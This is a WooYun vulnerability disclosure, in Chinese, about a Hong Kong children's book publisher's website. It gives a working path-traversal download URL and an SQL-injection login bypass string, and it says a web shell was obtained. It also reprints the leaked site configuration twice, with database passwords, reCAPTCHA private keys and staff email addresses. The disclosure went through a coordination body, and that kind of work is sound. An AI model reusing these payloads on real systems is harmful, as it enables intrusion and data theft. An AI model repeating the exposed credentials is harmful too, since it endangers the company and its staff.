当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169239

漏洞标题:思展兒童文化社有限公司設計缺陷任意文件下載+註入(已shell)(香港地區)

相关厂商:思展兒童文化社有限公司

漏洞作者: 路人甲

提交时间:2016-01-13 12:08

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

rt

详细说明:

目标:http://**.**.**.**
1.任意文件下载
构造,

http://**.**.**.**/force_download.php?file=../../force_download.php


1.png


配置文件

http://**.**.**.**/force_download.php?file=../../_common/site_config.php


site_config.php中

if(UAT){
    define('DEBUG_MODE', false);
    //define('ADMIN_MAIL', "admin@**.**.**.**");
		//define('ORDER_MAIL', "orders.sagebooks@**.**.**.**");
		define('ADMIN_MAIL', "tim.20130401@**.**.**.**");
		define('ORDER_MAIL', "tim.20130401@**.**.**.**");
    define('MAIL_FROM', "admin@**.**.**.**");
    define('MAIL_FROM_NAME', "Sage Sagebooks");
    define("SMTP", "localhost");
    define("SMTP_ID", "");
    define("SMTP_PWD", "");
    //Google Captcha http://**.**.**.**
    define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis");
    define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH");
    //database
    define('DB_USER', 'sagefoun_sage');
    define('DB_PWD', 'children2013');
    define('DB_HOST', 'localhost');
    define('DB_NAME', 'sagefoun_sage');
    //directory
    define('SERVER_URL', "http://**.**.**.**");
    define('SITE_ROOT', '/');
    //paypal
    define('PAYPAL_SITE', "**.**.**.**");
    define('PAYPAL_URL', "https://**.**.**.**/cgi-bin/webscr");
    define('PAYPAL_SELLER', "seller_1296180842_biz@**.**.**.**");
  }
//LIVE ==============================================================================
  elseif(LIVE){
    define('DEBUG_MODE', false);
    error_reporting(0);
    ini_set('display_errors', 0);
		//define('ORDER_TEST', true);
		define('ORDER_TEST', false);
		if(!ORDER_TEST){
			define('ADMIN_MAIL', "orders.sagebooks@**.**.**.**");
			define('ORDER_MAIL', "orders.sagebooks@**.**.**.**");
		}else{
			define('ADMIN_MAIL', "garlichsuen@**.**.**.**");
			define('ORDER_MAIL', "garlichsuen@**.**.**.**");
		}
    define('MAIL_FROM', "admin@**.**.**.**");
    define('MAIL_FROM_NAME', "思展 Sagebooks");
    define("SMTP", "localhost");
    define("SMTP_ID", "");
    define("SMTP_PWD", "");
    //Google Captcha sage
    define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis");
    define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH");
    //database
    //define('DB_USER', 'sagefoun_cms');
    //define('DB_PWD', 'children1997');
    //define('DB_HOST', 'localhost');
    //define('DB_NAME', 'sagefoun_cms');
    define('DB_USER', 'sagefoun_sage');
    define('DB_PWD', 'children2013');
    define('DB_HOST', 'localhost');
    define('DB_NAME', 'sagefoun_sage');


2.注入
后台

http://**.**.**.**/_sage_admin/index.php


构造

admin'or '1'='1


进入后台

2.png


利用编辑器和解析漏洞,拿下shell

4.png


6.png


7.png


漏洞证明:

1.png


site_config.php中

if(UAT){
    define('DEBUG_MODE', false);
    //define('ADMIN_MAIL', "admin@**.**.**.**");
		//define('ORDER_MAIL', "orders.sagebooks@**.**.**.**");
		define('ADMIN_MAIL', "tim.20130401@**.**.**.**");
		define('ORDER_MAIL', "tim.20130401@**.**.**.**");
    define('MAIL_FROM', "admin@**.**.**.**");
    define('MAIL_FROM_NAME', "Sage Sagebooks");
    define("SMTP", "localhost");
    define("SMTP_ID", "");
    define("SMTP_PWD", "");
    //Google Captcha http://**.**.**.**
    define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis");
    define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH");
    //database
    define('DB_USER', 'sagefoun_sage');
    define('DB_PWD', 'children2013');
    define('DB_HOST', 'localhost');
    define('DB_NAME', 'sagefoun_sage');
    //directory
    define('SERVER_URL', "http://**.**.**.**");
    define('SITE_ROOT', '/');
    //paypal
    define('PAYPAL_SITE', "**.**.**.**");
    define('PAYPAL_URL', "https://**.**.**.**/cgi-bin/webscr");
    define('PAYPAL_SELLER', "seller_1296180842_biz@**.**.**.**");
  }
//LIVE ==============================================================================
  elseif(LIVE){
    define('DEBUG_MODE', false);
    error_reporting(0);
    ini_set('display_errors', 0);
		//define('ORDER_TEST', true);
		define('ORDER_TEST', false);
		if(!ORDER_TEST){
			define('ADMIN_MAIL', "orders.sagebooks@**.**.**.**");
			define('ORDER_MAIL', "orders.sagebooks@**.**.**.**");
		}else{
			define('ADMIN_MAIL', "garlichsuen@**.**.**.**");
			define('ORDER_MAIL', "garlichsuen@**.**.**.**");
		}
    define('MAIL_FROM', "admin@**.**.**.**");
    define('MAIL_FROM_NAME', "思展 Sagebooks");
    define("SMTP", "localhost");
    define("SMTP_ID", "");
    define("SMTP_PWD", "");
    //Google Captcha sage
    define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis");
    define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH");
    //database
    //define('DB_USER', 'sagefoun_cms');
    //define('DB_PWD', 'children1997');
    //define('DB_HOST', 'localhost');
    //define('DB_NAME', 'sagefoun_cms');
    define('DB_USER', 'sagefoun_sage');
    define('DB_PWD', 'children2013');
    define('DB_HOST', 'localhost');
    define('DB_NAME', 'sagefoun_sage');


2.png


6.png


7.png


修复方案:

..

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-14 17:09

厂商回复:

已將事件通知有關機構

最新状态:

暂无